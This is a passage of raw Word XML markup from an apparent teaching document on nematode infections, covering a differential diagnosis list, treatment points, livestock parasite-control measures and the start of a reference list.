          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Differential </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>diagnosis</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>)</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Anemia</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Anthrax</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Appendicitis</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Asthma</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="5757A6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cholecystitis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Diverticulitis</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Hodgkin Disease</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Leprosy</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000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lymphedema</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="5757A6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LymphogranulomaVenereum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="5757A6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LGV)</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Pancreatitis, Acute</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Systemic Lupus Erythematosus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="5757A6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tuberculosis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">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t>Treatment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nematode infections need to be identified and treated accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dracunculiasis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, the best treatment is direct removal of worms from tissue, taking care not to break the worm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006B3C59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Treat secondary infections</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">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t>Prevention and control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"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t xml:space="preserve">The principle of a parasite control strategy is to keep the challenge to young livestock by the pathogenic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>trichostrongyle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> parasites at a minimum rate. This is achieved in the following ways.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:spacing w:after="0"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">(a) Controlling the density of livestock (stocking rate). Overstocking forces the animals to graze closer to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>faecal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> material and closer to the ground, and may result in the consumption of a higher number of infective larvae.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"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t>(b) Periodic deworming.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"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t xml:space="preserve">(c) Strategic deworming when conditions are most </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>favourable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for larval development on the pasture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"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t>(d) Separating age groups in the more intensive production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006B3C59">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(e) Reducing the effects of gastro-intestinal parasites by assuring an adequate plane of nutrition. Control programmers should reduce the effect of p</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>arasites to sub-economic levels</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Reference</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="00FD2BE6" w:rsidP="00FD2BE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E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A. M. A. Aguinaldo, J. M. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Turbeville</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, L. S. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Linford</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, M. C. Rivera, J. R. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Garey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, R. A. Raff, &amp; J. A. Lake, 1997. Evidence for a clade of nematodes, arthropods and other </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>moulting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> animals. Nature 387: 489-493.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="00FD2BE6" w:rsidP="00FD2BE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E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">R. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Buchsbaum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, M. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Buchsbaum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, J. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Pearse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, &amp; V. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Pearse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, 1987. </w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Animals </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Without</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Backbones</w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Chicago: University of Chicago Press.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="00FD2BE6" w:rsidP="00FD2BE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E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">T. I. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Storer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
